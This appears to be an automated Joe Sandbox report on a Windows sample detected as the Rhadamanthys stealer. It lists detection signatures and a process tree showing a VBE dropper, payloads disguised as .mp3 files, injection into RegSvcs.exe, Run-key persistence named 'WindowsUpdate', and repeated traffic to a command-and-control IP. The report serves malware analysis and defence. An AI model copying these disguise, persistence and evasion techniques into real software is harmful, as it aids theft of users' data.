Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ngPebbPhbp.exe

Overview

General Information

Sample name:ngPebbPhbp.exe
renamed because original name is a hash value
Original sample name:5f58e87fee021cbaa9ecfae2d5f8709bd0934b2d2d2779a8f24993425fb20350.exe
Analysis ID:1560167
MD5:fa000351e26e17543f67e3dedc97d37e
SHA1:c59fc4f489ac15d5a1d455abbf0c3c5ad6fcc189
SHA256:5f58e87fee021cbaa9ecfae2d5f8709bd0934b2d2d2779a8f24993425fb20350
Tags:77-105-161-194exeuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM autoit script
Yara detected AntiVM3
Yara detected Autoit Injector
Yara detected RHADAMANTHYS Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • ngPebbPhbp.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\ngPebbPhbp.exe" MD5: FA000351E26E17543F67E3DEDC97D37E)
    • wscript.exe (PID: 7436 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7524 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 7616 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 7552 cmdline: "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • qwlvpmrupf.mp3 (PID: 7640 cmdline: qwlvpmrupf.mp3 tnlupe.mp3 MD5: 0ADB9B817F1DF7807576C2D7068DD931)
          • RegSvcs.exe (PID: 7940 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
            • OpenWith.exe (PID: 7980 cmdline: "C:\Windows\system32\openwith.exe" MD5: 0ED31792A7FFF811883F80047CBCFC91)
      • cmd.exe (PID: 7676 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 7724 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • qwlvpmrupf.mp3.exe (PID: 8072 cmdline: "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3 MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 8124 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • qwlvpmrupf.mp3.exe (PID: 8188 cmdline: "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3 MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 4960 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • qwlvpmrupf.mp3.exe (PID: 4092 cmdline: "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3 MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 2740 cmdline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000E.00000002.1935619525.00000000060B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    0000000F.00000002.2946403129.0000000005A41000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000014.00000002.2208992211.00000000062C3000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          0000000F.00000003.1961307501.0000000005639000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 14 entries
            SourceRuleDescriptionAuthorStrings
            15.3.OpenWith.exe.59c0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              15.3.OpenWith.exe.57a0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7436, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 7524, ProcessName: cmd.exe
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7436, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 7524, ProcessName: cmd.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ngPebbPhbp.exe", ParentImage: C:\Users\user\Desktop\ngPebbPhbp.exe, ParentProcessId: 7300, ParentProcessName: ngPebbPhbp.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , ProcessId: 7436, ProcessName: wscript.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ngPebbPhbp.exe", ParentImage: C:\Users\user\Desktop\ngPebbPhbp.exe, ParentProcessId: 7300, ParentProcessName: ngPebbPhbp.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , ProcessId: 7436, ProcessName: wscript.exe
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ngPebbPhbp.exe", ParentImage: C:\Users\user\Desktop\ngPebbPhbp.exe, ParentProcessId: 7300, ParentProcessName: ngPebbPhbp.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , ProcessId: 7436, ProcessName: wscript.exe
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, ProcessId: 8072, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: qwlvpmrupf.mp3 tnlupe.mp3, CommandLine: qwlvpmrupf.mp3 tnlupe.mp3, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, NewProcessName: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, OriginalFileName: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: qwlvpmrupf.mp3 tnlupe.mp3, ProcessId: 7640, ProcessName: qwlvpmrupf.mp3
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: qwlvpmrupf.mp3 tnlupe.mp3, ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, ParentProcessId: 7640, ParentProcessName: qwlvpmrupf.mp3, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe", ProcessId: 7940, ProcessName: RegSvcs.exe
                Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3, CommandLine: "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, NewProcessName: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, OriginalFileName: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3, ProcessId: 8072, ProcessName: qwlvpmrupf.mp3.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ngPebbPhbp.exe", ParentImage: C:\Users\user\Desktop\ngPebbPhbp.exe, ParentProcessId: 7300, ParentProcessName: ngPebbPhbp.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" , ProcessId: 7436, ProcessName: wscript.exe
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3, ProcessId: 7640, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: ngPebbPhbp.exeReversingLabs: Detection: 55%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
                Source: ngPebbPhbp.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ngPebbPhbp.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ngPebbPhbp.exe, 00000000.00000000.1695435766.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp, ngPebbPhbp.exe, 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                Source: Binary string: wkernel32.pdb source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdb source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ntdll.pdb source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdbUGP source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B0F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B0F826
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B21630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00B21630
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003DE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,7_2_003DE387
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003DD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_003DD836
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003DDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_003DDB69
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003E9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_003E9F9F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003EA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_003EA0FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003EA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,7_2_003EA488
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003E65F1 FindFirstFileW,FindNextFileW,FindClose,7_2_003E65F1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003E7248 FindFirstFileW,FindClose,7_2_003E7248
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003E72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,7_2_003E72E9
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DFE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00DFE387
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DFD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00DFD836
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DFDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00DFDB69
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E09F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00E09F9F
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E0A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00E0A0FA
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E0A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00E0A488
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E065F1 FindFirstFileW,FindNextFileW,FindClose,16_2_00E065F1
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E072E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00E072E9
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E07248 FindFirstFileW,FindClose,16_2_00E07248
                Source: global trafficTCP traffic: 192.168.2.4:49736 -> 51.75.171.9:5151
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
                Source: unknownTCP traffic detected without corresponding DNS query: 51.75.171.9
